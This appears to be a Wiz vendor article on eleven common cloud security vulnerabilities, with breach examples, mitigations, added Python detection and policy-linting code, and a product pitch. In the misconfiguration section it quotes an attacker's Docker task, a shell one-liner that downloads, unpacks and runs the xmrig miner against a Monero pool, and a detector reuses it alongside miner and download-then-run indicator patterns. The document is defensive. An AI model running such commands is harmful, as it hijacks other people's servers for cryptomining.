What are cloud vulnerabilities?
Cloud security vulnerabilities are weaknesses in a cloud computing environment—like misconfigurations, a lack of encryption, and unsecured APIs—that attackers exploit to gain unauthorized access, steal data, or disrupt services.
According to Wiz Research’s 2025 findings, 54% of cloud environments face vulnerabilities due to serverless functions and exposed virtual machines (VMs) that contain critical data. But this is just one small part of the vulnerability landscape that your company should be aware of. Attackers continue to seek out these vulnerabilities because they are easier to exploit. Even though they are common, organizations still do not take the proper steps to protect against them, either because they are not aware of the risk or simply do not know how to mitigate it. This article aims to address both of these issues.
Verizon, too, emphasizes the 2025 vulnerability climate. According to its 2025 Data Breach Investigations Report, “The exploitation of vulnerabilities has seen another year of growth as an initial access vector for breaches, reaching 20%.” The consequences of such data breaches include reputational damage, reduced profit margins, organizational and operational disruption, and legal fines. In fact, Statista reported an average cost of $9.48 million for a United States data breach in 2023.
The cause of most cloud breaches is one of several types of vulnerabilities, which attackers continue to seek out because they’re easier to exploit. Thankfully, there are ways to mitigate these vulnerabilities so you can avoid falling victim to breaches.
The 11 cloud security vulnerabilities you’re sure to encounter
The most common cloud security vulnerabilities are the 11 covered below. We’ll explain each of them, with real-life examples of attacks that exploited these vulnerabilities and simple steps you can take to mitigate them:
1. Misconfigurations
Misconfigurations are errors in the security settings of cloud applications and systems, including VMs, containers, serverless environments, and infrastructure as code (IaC). They’re often the byproduct of administrative oversight, high-velocity development environments, a lack of awareness, and security misconceptions.
Ultimately, cloud misconfigurations are among the main attack vectors for data breaches. Common ones include open ports for outbound server traffic, overprivileged identities, a lack of monitoring, unsecured storage (like open S3 buckets), the use of default passwords and credentials, and third-party misconfigurations.
Real-life example:
Wiz Research found a cryptojacking campaign in June 2025 that a group called JINX-0132 was conducting. The group was exploiting misconfigurations in DevOps tooling, such as Docker API and Gitea, to deploy its software. For example, attackers would identify a misconfigured and outdated instance that facilitated remote code execution.
Each malicious task from the group looked like the following:
"Config": {
    "command": "sh",
    "args": [
        "-c",
        "apt-get update -y ; sudo apt-get update -y ; apt-get install wget ; sudo apt-get install wget ; wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz ; sudo wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz ; tar -xzf xmrig-6.22.2-linux-static-x64.tar.gz ; cd xmrig-6.22.2 ; chmod 777 xmrig ; sudo chmod 777 xmrig ; ./xmrig -o pool.supportxmr.com:443 -u 468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e2s7tWFxvBM33FAEP4JbwYHEeXexq8djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E --tls --coin monero --cpu-max-threads-hint=90 -p {redacted}:4646"
    ]
}
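A scheduler-side or audit-log check that would flag a task like this before it runs, as an added Python example (not Wiz tooling and not from the campaign write-up): it flattens the task's command and args into one string and scores it against indicators taken from the task above. The sample task, the indicator weights and the alert threshold are constructed assumptions.

```python
import re

# Constructed sample in the same shape as the task above (wallet replaced by a placeholder);
# assumed for illustration, not copied from a real incident.
SAMPLE_TASK = {
    "Config": {
        "command": "sh",
        "args": [
            "-c",
            "apt-get install wget ; "
            "wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz ; "
            "tar -xzf xmrig-6.22.2-linux-static-x64.tar.gz ; cd xmrig-6.22.2 ; chmod 777 xmrig ; "
            "./xmrig -o pool.supportxmr.com:443 -u WALLET_PLACEHOLDER --tls --coin monero --cpu-max-threads-hint=90",
        ],
    }
}

# A normal service task for comparison (constructed).
BENIGN_TASK = {"Config": {"command": "/usr/local/bin/app", "args": ["--port", "8080"]}}

# (name, pattern, weight). Weights and the threshold below are hypothetical tuning values.
INDICATORS = [
    ("miner_binary", re.compile(r"\bxmrig\b", re.I), 5),
    ("mining_pool", re.compile(r"\b(supportxmr|minexmr|nanopool|hashvault)\b", re.I), 5),
    ("coin_flag", re.compile(r"--coin\s+monero", re.I), 4),
    ("cpu_hint", re.compile(r"--cpu-max-threads-hint", re.I), 3),
    # download followed (after a ';') by unpacking, chmod or direct execution
    ("download_then_run", re.compile(r"\b(wget|curl)\b[^;|]*;\s*.*?(?:\btar\b|\bchmod\b|\./)", re.I), 2),
    ("world_writable_exec", re.compile(r"chmod\s+777", re.I), 2),
]
ALERT_THRESHOLD = 6


def flatten_command(task: dict) -> str:
    """Join command and args into one string so shell one-liners can be inspected."""
    cfg = task.get("Config", {})
    return " ".join([str(cfg.get("command", ""))] + [str(a) for a in cfg.get("args", [])])


def score_task(task: dict) -> dict:
    """Score a task against INDICATORS; verdict is 'cryptomining' once the weighted score crosses the threshold."""
    cmd = flatten_command(task)
    hits = [(name, weight) for name, pattern, weight in INDICATORS if pattern.search(cmd)]
    score = sum(weight for _, weight in hits)
    return {
        "score": score,
        "indicators": [name for name, _ in hits],
        "verdict": "cryptomining" if score >= ALERT_THRESHOLD else "ok",
    }
```

The same scoring applies to Docker API container specs or CI job definitions once their command fields are flattened the same way.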
Basic mitigation steps:
Use a cloud security posture management tool to regularly audit and remediate cloud configurations.
Implement least privilege access to cloud resources.
Incorporate IaC to maintain consistent, correct configurations.
2. Lack of visibility
Enterprises often mix and match technologies from various cloud service providers ad hoc to create complex, interconnected, and constantly evolving IT environments. As a result, they may find cloud security vulnerabilities of different proportions scattered across this dynamic infrastructure.
Unfortunately, a lack of visibility can be detrimental to identifying, contextualizing, prioritizing, and mitigating these vulnerabilities. It’s impossible to assess the risk of cloud computing vulnerabilities without centralized, context-based visibility of the entire cloud ecosystem.
Real-life example:
A lack of visibility also means that companies can be vulnerable for years without knowing it. For instance, Toyota Japan unknowingly exposed the personal and vehicle data of 2.15 million customers for almost 10 years. With better visibility, Toyota could have identified and addressed the cloud misconfiguration that caused the data exposure much sooner.
Basic mitigation steps:
Implement centralized logging and monitoring solutions for all cloud resources.
Employ a cloud native application protection platform to gain visibility into all cloud assets and activity.
Set up alerts for unusual or unauthorized activities.
Regularly review and prune unnecessary resources.
3. Poor access management
Digital identities vastly outnumber human identities in cloud environments, which makes them alluring targets for threat actors. That’s why identity and access management, as well as other identity-related cloud vulnerabilities, can be powerful initial attack vectors for cybercriminals to infiltrate an IT environment, exfiltrate data, and cause lateral damage.
Access management vulnerabilities include a lack of MFA, poor password and credential hygiene, misconfigured policies, mushrooming of administrative entitlements, and a lack of standardized, automated identity lifecycles and centralized access management capabilities.
Real-life example:
In 2024, attackers accessed email addresses, hashed passwords, and other credentials from Dropbox Sign using an access vulnerability within an automated system configuration tool. While the attack exposed users’ credentials, Dropbox was able to automatically mitigate the attack’s effect since it had isolated its Sign infrastructure from its other tools and systems.
Basic mitigation steps:
Implement least privilege access to cloud resources.
Use role-based access control to grant users only the permissions they need.
Adopt MFA and single sign-on solutions.
Conduct training sessions for proper access management practices.
Adopt a cloud access security broker to monitor and control access to cloud resources.
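The "open S3 bucket" and "overprivileged identity" misconfigurations from section 1 and the least-privilege and role-based steps above both come down to what an access policy document allows. Here is an added Python linter (example code, not Wiz's or AWS's) that flags a public principal without a Condition and a wildcard action granted on all resources; the three sample policies are constructed.

```python
import json

# Constructed sample policies (assumed, not from any real account).
PUBLIC_BUCKET_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow", "Principal": "*",
                 "Action": ["s3:GetObject", "s3:ListBucket"],
                 "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"]}]
}""")

ADMIN_ROLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
}""")

SCOPED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Effect": "Allow",
                 "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
                 "Action": "s3:GetObject",
                 "Resource": "arn:aws:s3:::example-bucket/reports/*",
                 "Condition": {"Bool": {"aws:SecureTransport": "true"}}}]
}""")


def _as_list(value):
    """Policy fields may be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principal_is_public(principal) -> bool:
    """'*' or {"AWS": "*"} both grant access to anyone, including anonymous callers."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(p == "*" for val in principal.values() for p in _as_list(val))
    return False


def lint_policy(policy: dict) -> list:
    """Return human-readable findings for an IAM or S3 bucket policy document."""
    findings = []
    for i, st in enumerate(_as_list(policy.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue  # Deny statements only narrow access
        actions = _as_list(st.get("Action"))
        resources = _as_list(st.get("Resource"))
        if _principal_is_public(st.get("Principal")) and not st.get("Condition"):
            findings.append(f"statement {i}: public principal with no Condition (open bucket)")
        if any(a == "*" or a.endswith(":*") for a in actions) and "*" in resources:
            findings.append(f"statement {i}: wildcard action on all resources (overprivileged)")
        elif "*" in resources:
            findings.append(f"statement {i}: actions {actions} allowed on every resource")
    return findings
```

Run it over every bucket policy and role policy in an account export and the findings map directly onto the first two mitigation steps above.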
4. Insider threats
Insider threats are vulnerabilities that are due to individuals or entities that already have some degree of access to and knowledge of an enterprise’s IT environment. Potential insiders include current and former employees, third-party vendors, and partners.
These threats result from accidental errors, negligence, or malicious intent. Insider attacks via phishing and other social engineering techniques are common because humans are always the weakest link in a company’s cybersecurity posture.
Real-life example:
Disgruntled cloud professionals are major security threats to enterprises because of their in-depth knowledge of cloud computing vulnerabilities and how to exploit them. For instance, the 2019 Capital One breach—which compromised the data of over 100 million Americans and Canadians—was a result of actions that a former Amazon engineer took. This threat actor had the know-how and technical expertise to hack Capital One’s Amazon cloud infrastructure. The result was a cyberattack that cost an estimated $100M–$150M to remediate.
In a more recent example, grocery startup KiranaPro faced a breach after conducting layoffs. A disgruntled former employee eliminated sections of backend infrastructure, including cloud logs and GitHub code, to sabotage the company.
Basic mitigation steps:
Monitor employee activity for suspicious behavior.
Implement strict access controls, even for trusted insiders.
Conduct background checks on employees who have critical access.
Offer training and create a company culture that emphasizes cybersecurity.
5. Unsecured APIs
Because cloud APIs are the connective tissue that facilitates communication and data exchange between cloud software and applications, API vulnerabilities are a prominent attack vector for threat actors. Examples of vulnerabilities with unsecured APIs include suboptimal access controls, weak authentication protocols, wrong rate limits, and accidental data exposure.
Real-life example:
The attack vector for the Optus data breach in 2022 was an unsecured, publicly available API that didn’t require authentication protocols to access. This breach compromised around 10 million customers’ sensitive records.
Basic mitigation steps:
Implement strong authentication and authorization mechanisms for cloud APIs.
Use rate limiting and other controls to prevent API abuse.
Regularly scan APIs for vulnerabilities.
6. Zero-days
Zero-day vulnerabilities are flaws that no one has patched yet, because the vendor and your team did not know they existed until threat actors began exploiting them. They can take many of the forms we previously mentioned; what makes them zero-days is that they go undetected, so detection and monitoring are the controls that matter most.
Real-life example:
Microsoft and Google are two of the most prominent victims of zero-day attacks. In 2023, glitches in Microsoft Windows and Office products could have allowed threat actors to conduct remote code execution attacks, exfiltrate data, and lock access for legitimate users. That same year, Google had to address a series of zero-day Chrome vulnerabilities, one of which had a high severity score.
Basic mitigation steps:
Keep all software and systems up-to-date.
Implement intrusion detection and prevention systems.
Use virtual patching to mitigate risks until vendors release patches.
7. Shadow IT
Shadow IT involves the use of your cloud assets without your IT department’s approval or support. There are several security risks associated with this, including the financial impact of staff creating cloud workloads for personal use, data loss via unauthorized file sharing services, and the use of unauthorized messaging services for communications.
Some users who are frustrated with in-house technology may look to more familiar tools to improve their productivity, while others want to leverage loopholes to spend their time on non-work activities—or even steal company data.
Real-life example:
In 2024, fintech provider Finastra learned that an attacker had accessed a third-party secure file transfer platform (SFTP) that it used for customer file transfers. The stolen data included sensitive customer files, which the attacker put up for sale on the dark web. The vendor shadow IT issue occurred because the SFTP was outside the company’s central security team’s control and monitoring. Because the team wasn’t managing this process, Finastra didn’t detect the breach immediately.
Basic mitigation steps:
Eliminate shadow code, or unauthorized code, that developers use.
Design business-specific security policies to meet your organization’s unique requirements and objectives.
Leverage access controls across cloud environments to police IT assets, who can commission them, and where they can integrate them.
8. Lack of encryption
When you encrypt data, you transform it into a format that users can only read if they have the encryption key. Because of this, even if unauthorized individuals obtain the encrypted data, they can’t decipher it. A lack of encryption, however, presents a significant vulnerability in cloud storage since it allows unauthorized individuals to access sensitive data if they infiltrate the cloud environment.
Additionally, encryption in transit for cloud services (like HTTPS) prevents malicious users from accessing data as it moves between systems.
Real-life example:
One of the most significant data breaches in history occurred at Equifax, one of three major consumer credit reporting agencies in the US. This 2017 cyberattack compromised about 148 million people’s personal data. While the root cause of the breach was an unpatched vulnerability in the Apache Struts web framework, subsequent investigations found that Equifax had stored sensitive data without encryption, which significantly exacerbated the breach’s impact.
Basic mitigation steps:
Encrypt data in transit, as well as at rest, to avoid unintentionally allowing third-party access to cloud data.
Configure your systems and data stores so users can only access them via secure protocols.
Use firewalls to block insecure access methods.
Consider full disk encryption using AES256 for maximum security for VM disks.
Leverage transparent data encryption to keep databases secure while in use.
9. Inadequate segmentation
Many cloud environments lack strong segmentation controls, which makes it easier for attackers to move laterally when they gain access. Implementing segmentation, however, can prevent a breach from escalating, spreading to different parts of the cloud environment, and affecting assets like customer data and credentials.
Real-life example:
In 2025, Unimicron, Presto, and other companies faced an increase in ransomware attacks. Due to poor segmentation, particularly between IT and operational technology, compromises spread across environments in most of these instances.
Another victim was the South African Weather Service (SAWS). Due to the attack, the organization faced issues with its forecasting process and couldn’t rely on its system for accurate reporting. Instead, SAWS had to use different sources to provide information, and its limited service affected critical sectors like aviation and marine.
Basic mitigation steps:
Enforce strict network zoning to control traffic flow.
Deploy internal firewalls, add continuous monitoring, and validate and test your segmentation regularly.
Segment access to your critical systems by making isolation the default protocol and creating essential assets with controlled gateways.
10. Vulnerable dependencies
When cloud native applications depend on third-party resources like libraries and services, a compromise of any of those dependencies becomes a compromise of your own systems. If a partner updates its software, for example, that update could unknowingly introduce malicious code or backdoors into your environment.
These dangers should remind organizations to be aware of third-party security gaps and build their own security infrastructure. Solutions like Wiz also identify third-party risks and provide features for mitigation and protection.
Real-life example:
Attackers found a vulnerability in MOVEit, a file transfer app, when CL0p threat actors injected malware to retrieve private information. The breach of this third-party file transfer tool affected thousands of organizations worldwide that relied on it to transfer data both internally and externally.
Basic mitigation steps:
Maintain an inventory of your third-party services, SDKs, and libraries.
Scan unknown vulnerabilities with automated, cloud native solutions like Wiz.
Monitor security alerts to patch dependency risks quickly.
Implement runtime security tools to find strange behavior from third-party code and applications.
11. Deficient logging and monitoring
You could face cloud threats for months without detection if you aren’t actively monitoring your cloud environment. Because of this, a small compromise could turn into a much larger cloud breach across your infrastructure.
Real-life example:
Jelly Bean Communications, which created and hosted a website for children’s health insurance, faced a fine for a breach that remained undetected for seven years (2013–2020). Because the company had to comply with the HIPAA Security Rule, it faced severe consequences when a federal inquiry found that the breach was a direct result of the company neglecting to patch multiple site vulnerabilities. In 2023, Jelly Bean settled the case for $293,771 due to the failure, which potentially exposed 3.5 million applicants and enrollees.
Basic mitigation steps:
Document relevant events like login attempts, failed authentication, API calls, and other details to help you find anomalies. (A solution like Wiz helps you filter out noise and prioritize risks.)
Centralize your logs from servers, applications, and cloud services into one cloud native solution for full visibility.
Automate detection and alerting to get on top of issues in real time.
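To make the first and third steps concrete, here is an added Python detection (not Wiz's code) that runs over constructed CloudTrail-style ConsoleLogin events and alerts on a burst of failed authentications from one source for one user, escalating when a success follows the burst. The five-minute window and the five-failure threshold are assumptions to tune per environment.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed CloudTrail-style events (not real logs), reduced to the fields the rule needs.
SAMPLE_LOG = """
{"eventTime":"2025-06-01T10:00:01Z","eventName":"ConsoleLogin","sourceIPAddress":"198.51.100.7","userIdentity":{"userName":"alice"},"responseElements":{"ConsoleLogin":"Failure"}}
{"eventTime":"2025-06-01T10:00:09Z","eventName":"ConsoleLogin","sourceIPAddress":"198.51.100.7","userIdentity":{"userName":"alice"},"responseElements":{"ConsoleLogin":"Failure"}}
{"eventTime":"2025-06-01T10:00:15Z","eventName":"ConsoleLogin","sourceIPAddress":"198.51.100.7","userIdentity":{"userName":"alice"},"responseElements":{"ConsoleLogin":"Failure"}}
{"eventTime":"2025-06-01T10:00:22Z","eventName":"ConsoleLogin","sourceIPAddress":"198.51.100.7","userIdentity":{"userName":"alice"},"responseElements":{"ConsoleLogin":"Failure"}}
{"eventTime":"2025-06-01T10:00:30Z","eventName":"ConsoleLogin","sourceIPAddress":"198.51.100.7","userIdentity":{"userName":"alice"},"responseElements":{"ConsoleLogin":"Failure"}}
{"eventTime":"2025-06-01T10:00:41Z","eventName":"ConsoleLogin","sourceIPAddress":"198.51.100.7","userIdentity":{"userName":"alice"},"responseElements":{"ConsoleLogin":"Success"}}
{"eventTime":"2025-06-01T10:05:00Z","eventName":"ConsoleLogin","sourceIPAddress":"203.0.113.5","userIdentity":{"userName":"bob"},"responseElements":{"ConsoleLogin":"Failure"}}
{"eventTime":"2025-06-01T10:05:30Z","eventName":"ConsoleLogin","sourceIPAddress":"203.0.113.5","userIdentity":{"userName":"bob"},"responseElements":{"ConsoleLogin":"Success"}}
"""

WINDOW = timedelta(minutes=5)   # hypothetical tuning values
THRESHOLD = 5


def parse_events(text: str) -> list:
    """Parse one JSON event per line and sort by time, which is what the sliding window assumes."""
    events = []
    for line in text.strip().splitlines():
        event = json.loads(line)
        event["_ts"] = datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(event)
    return sorted(events, key=lambda e: e["_ts"])


def detect_login_bruteforce(events: list) -> list:
    """One alert per (source IP, user) that reaches THRESHOLD failures inside WINDOW,
    plus a higher-priority alert if a success follows such a burst."""
    alerts = []
    failures = defaultdict(list)  # (ip, user) -> timestamps of failures still inside the window
    already_alerted = set()
    for event in events:
        if event.get("eventName") != "ConsoleLogin":
            continue
        key = (event["sourceIPAddress"], event["userIdentity"].get("userName", "?"))
        outcome = event.get("responseElements", {}).get("ConsoleLogin")
        recent = [t for t in failures[key] if event["_ts"] - t <= WINDOW]
        if outcome == "Failure":
            recent.append(event["_ts"])
            if len(recent) >= THRESHOLD and key not in already_alerted:
                already_alerted.add(key)
                alerts.append({"rule": "login_bruteforce", "ip": key[0], "user": key[1], "failures": len(recent)})
        elif outcome == "Success" and len(recent) >= THRESHOLD:
            # A success right after a burst of failures is the case to page on.
            alerts.append({"rule": "bruteforce_then_success", "ip": key[0], "user": key[1], "failures": len(recent)})
            recent = []
        failures[key] = recent
    return alerts
```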
A walkthrough of the cloud vulnerability management lifecycle
Understanding the six-part vulnerability management lifecycle below will help you take action, stay organized, and manage risk with confidence:
Discovery and assessment: Scan your environment to uncover misconfigurations, unpatched software, and exposure points. Without full coverage, you risk missing critical blind spots in identity, data, or runtime.
Prioritization: Filter findings based on real-world exploitability, not just CVSS scores. Teams often waste time patching irrelevant issues while real risks go unaddressed.
Remediation: Assign fixes to the right teams and move fast to block attack paths. Delays, unclear ownership, and risky patches can leave windows open for compromise.
Verification and monitoring: Continuously validate that fixes remain effective so risks don’t recur. Drift, poor visibility, and skipped re-scans can reintroduce threats quietly.
Reporting: Track trends and outcomes to show your security progress. Many teams default to issue counts, but execs should care about time to remediate in order to reduce risk.
Improvement: Use the lessons you’ve learned to improve your tooling, workflows, and response speed. Neglecting continuous vulnerability management for a static checklist limits your long-term maturity.
The role of automation in spotting and addressing vulnerabilities
One way to immediately improve your vulnerability management process is by using automation. This technology speeds up your process, eliminates human error and blind spots, and provides more comprehensive security.
Here’s how automation can improve your risk management:
Finds new assets and vulnerabilities immediately
Organizes risks to your organization and security by severity so you know which to manage first
Orchestrates remediation through efficient workflows
Real-world example: Automation proved especially useful for one US Navy research facility and its partnership with tech firm Strategic Business Systems (SBS). Due to a complex cloud environment and high standards from the Department of Defense (DoD), the firm needed a solution to secure its infrastructure while maintaining full visibility. SBS chose Wiz to centralize the US Navy facility’s environment, with automation at the forefront. Due to Wiz’s automated security, scanning, and compliance features, SBS could then meet the DoD’s standards.
Overall, adding automation to your security stack minimizes manual processes and helps you scale your defense into a proactive security approach. As we saw in the previous example, Wiz’s agentless scanning and AI-powered remediation features help with this by providing contextual guidance throughout the code-to-cloud pipeline.
Wiz: A better approach to combating cloud vulnerabilities
The volume of cloud security vulnerabilities in dynamic IT environments is often overwhelming for businesses. And while they may use traditional vulnerability management solutions to identify and remediate vulnerabilities, these often lack the context that businesses need to separate the high-risk vulnerabilities from the low-risk ones.
Wiz tackles these challenges by focusing on the most crucial and highest-risk cloud vulnerabilities via agentless deep vulnerability scanning and analysis.
As we scale and gain more customers, we are confident that we can tell them we are aware of all known vulnerabilities, and that new vulnerabilities will be quickly visible to us too.
Kashfun Nazir, Information Security Lead & Data Protection Officer, Atlan
Because Wiz’s cloud vulnerability risk assessment considers workload, cloud, and business context, it doesn’t just uncover vulnerabilities—it also illustrates how and why they impact your organization. This helps you keep your IT environments safe from cloud computing vulnerabilities without alert fatigue. Request a demo today to learn how Wiz’s unique approach to mitigating cloud security vulnerabilities can fortify your cloud environments.
Want to see your cloud infrastructure’s health now? Download our free CVE Risk Assessment to identify the vulnerabilities that expose your cloud and learn how to address them effectively.